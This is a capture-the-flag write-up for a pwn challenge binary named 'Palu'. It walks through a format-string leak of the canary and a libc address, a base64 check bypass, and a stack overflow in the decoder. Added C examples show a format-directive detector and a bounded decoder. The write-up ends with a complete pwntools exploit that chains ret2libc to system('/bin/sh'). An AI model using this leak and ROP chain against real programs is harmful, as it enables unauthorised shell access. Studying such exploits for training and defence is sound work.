File protections
libc version
libc6_2.23-0ubuntu11.3_amd64
Loading in IDA
Suspected backdoor function
No overflow point
The main function has a format string vulnerability
The menu function has no overflow vulnerability; judging by the letter prompts, the two functions appear to perform encoding and decoding
The decode function has a stack overflow vulnerability
Approach
Because the binary has canary enabled, the stack overflow first requires leaking the canary; because there is no backdoor function and no suitable static function in the binary, we also need to leak a libc address and do ret2libc
Implementation
First set a breakpoint
Set the breakpoint just before the stack overflow
Leak the canary using the format string vulnerability
Canary offset: the distance from v10 to the top of the stack
v4 = 8h + 88h = 90h; canary offset = v4 - v10 = 90h - 8h = 88h = 136/8 = 17; on amd64 the 6 register-passed arguments must be added, so the offset is 25
io.sendafter("Please tell me your name\n","%23$p")
canary = int(io.recv(18),16)
Since we also need to leak a libc address later, we use __libc_start_main_ret, which sits on the stack after the canary, for that leak
io.sendafter("Please tell me your name\n","%23$p-%25$p")
canary = int(io.recv(18),16)
io.recvuntil(b'-')
libc_base = int(io.recv(14),16) - 0x20840
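The leak above only works because the name string is handed to printf as the format itself, so positional directives such as %23$p read stack slots. Added example (not code from the writeup or the challenge binary): the hardened form of the greeting, where user data is always an argument and the output is bounded, plus a small directive counter that a defender can run over logged "name" fields to spot probes like %23$p-%25$p. Function names are my own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Count printf conversion directives in untrusted input. A real name should
 * contain none; a non-zero count in a logged name field flags a format-string
 * probe. Handles "%%" (literal percent), positional "%N$", flags, width,
 * precision and length modifiers, so "%23$p-%25$p" counts as 2. */
int count_format_directives(const char *s) {
    int n = 0;
    const char *p = s;
    while (*p) {
        if (*p++ != '%') continue;
        if (*p == '%') { p++; continue; }                 /* "%%" is a literal '%' */
        const char *q = p;                                 /* positional "%N$" */
        while (isdigit((unsigned char)*q)) q++;
        if (*q == '$') p = q + 1;
        while (*p && strchr("-+ #0", *p)) p++;             /* flags */
        while (isdigit((unsigned char)*p) || *p == '*') p++;   /* width */
        if (*p == '.') {                                   /* precision */
            p++;
            while (isdigit((unsigned char)*p) || *p == '*') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;           /* length modifier */
        if (*p && strchr("diouxXeEfFgGaAcspn", *p)) { n++; p++; }
        /* otherwise a stray or malformed '%': not a directive, keep scanning */
    }
    return n;
}

/* Hardened greeting: the format string is a constant, the name is only ever
 * an argument, and the write is bounded by cap. Returns the number of bytes
 * written, or -1 if the greeting would not fit (output is then unusable). */
int greet(const char *name, char *out, size_t cap) {
    int r = snprintf(out, cap, "Hello, %s!", name);
    if (r < 0 || (size_t)r >= cap) return -1;
    return r;
}

int main(void) {
    char buf[64];
    const char *probe = "%23$p-%25$p";   /* constructed sample input */
    printf("directives in \"%s\": %d\n", probe, count_format_directives(probe));
    if (greet(probe, buf, sizeof buf) >= 0)
        printf("%s\n", buf);             /* prints the directives literally */
    return 0;
}
```

With printf("%s", name) the %23$p in the input is echoed back as text instead of being interpreted, which is the whole fix; the counter is only a detection aid for logs and input validation.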
Bypassing the check
Send input that decodes to Palu to pass the check
exp
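The overflow lives in the decoder: it writes the decoded bytes into a fixed stack buffer without checking how many will fit, which is why the "A small gift" input after the Palu check can overwrite the return address. Added example (my code, not the challenge's palu64 routine): a decoder that computes the decoded length up front and refuses input that would not fit. It assumes the standard base64 alphabet with '=' padding, which is consistent with UGFsdQ== decoding to Palu.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Map one base64 alphabet character to its 6-bit value, or -1 if invalid. */
static int b64_value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode NUL-terminated base64 `in` into `out`, writing at most out_cap bytes.
 * Returns the number of bytes written, or -1 if the input is malformed or the
 * decoded data would not fit. The up-front size check is what an unbounded
 * stack-buffer decoder lacks: nothing is written unless all of it fits. */
long b64_decode_bounded(const char *in, unsigned char *out, size_t out_cap) {
    size_t in_len = strlen(in);
    if (in_len % 4 != 0) return -1;
    size_t pad = 0;
    if (in_len >= 1 && in[in_len - 1] == '=') pad++;
    if (in_len >= 2 && in[in_len - 2] == '=') pad++;
    size_t need = in_len / 4 * 3 - pad;
    if (need > out_cap) return -1;            /* refuse before touching out */

    size_t o = 0;
    for (size_t i = 0; i < in_len; i += 4) {
        unsigned int acc = 0;
        int n = 0, seen_pad = 0;
        for (int k = 0; k < 4; k++) {
            char c = in[i + k];
            if (c == '=') {
                /* padding only in the last group, only in positions 2 and 3 */
                if (i + 4 != in_len || k < 2) return -1;
                seen_pad = 1;
                acc <<= 6;
            } else {
                if (seen_pad) return -1;      /* data after padding */
                int v = b64_value(c);
                if (v < 0) return -1;
                acc = (acc << 6) | (unsigned)v;
                n++;
            }
        }
        /* n sextets carry n-1 bytes; the o < out_cap guards are belt and braces */
        if (n >= 2 && o < out_cap) out[o++] = (acc >> 16) & 0xff;
        if (n >= 3 && o < out_cap) out[o++] = (acc >> 8) & 0xff;
        if (n == 4 && o < out_cap) out[o++] = acc & 0xff;
    }
    return (long)o;
}

int main(void) {
    unsigned char gift[8];                    /* small fixed buffer, as on the stack */
    long n = b64_decode_bounded("UGFsdQ==", gift, sizeof gift);   /* constructed sample */
    if (n > 0) printf("decoded %ld bytes: %.*s\n", n, (int)n, gift);
    /* a longer string is rejected instead of spilling past gift[] */
    printf("oversized input -> %ld\n",
           b64_decode_bounded("UGFsdXBhbHVwYWx1", gift, sizeof gift));
    return 0;
}
```

Rejecting on length before decoding is the simplest correct fix; the alternative of truncating silently would still let the caller believe it got a full decode.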
from pwn import *
context(log_level='debug', arch='amd64', os='linux')
filename = './Palu'
io = process(filename)
#io = remote("192.168.20.1",9078)
elf = ELF(filename)
libc = elf.libc
#libc = ELF('./libc.so.6')

def debug():
    gdb.attach(io, 'b *0x400e16')

# 1. Leak libc and canary via the format string
io.sendafter("Please tell me your name\n", "%23$p-%25$p")
canary = int(io.recv(18), 16)
io.recvuntil(b'-')
libc_base = int(io.recv(14), 16) - 0x20840
print("canary:" + hex(canary))
print("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.sym['system']
# (1) and (2) give the same result; (2) is the one used here
#(1)pop_rdi = libc_base + 0x0000000000021112  # pop rdi; ret;
pop_rdi = 0x00000000004010a3  # (2) pop rdi; ret; gadget in the binary
ret = 0x0000000000400761  # ret;
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))
# 2. Run the decode operation
io.sendlineafter("Please tell me your options\n", "2")
#debug()
io.sendlineafter("Enter a palu64 string to decode: ", "UGFsdQ==")  # decodes to Palu, which passes the check
# standard ret2libc
payload = flat([cyclic(0x18), canary, 0x12345678, pop_rdi, bin_sh_addr, ret, system_addr])
io.sendafter("A small gift", payload)
io.interactive()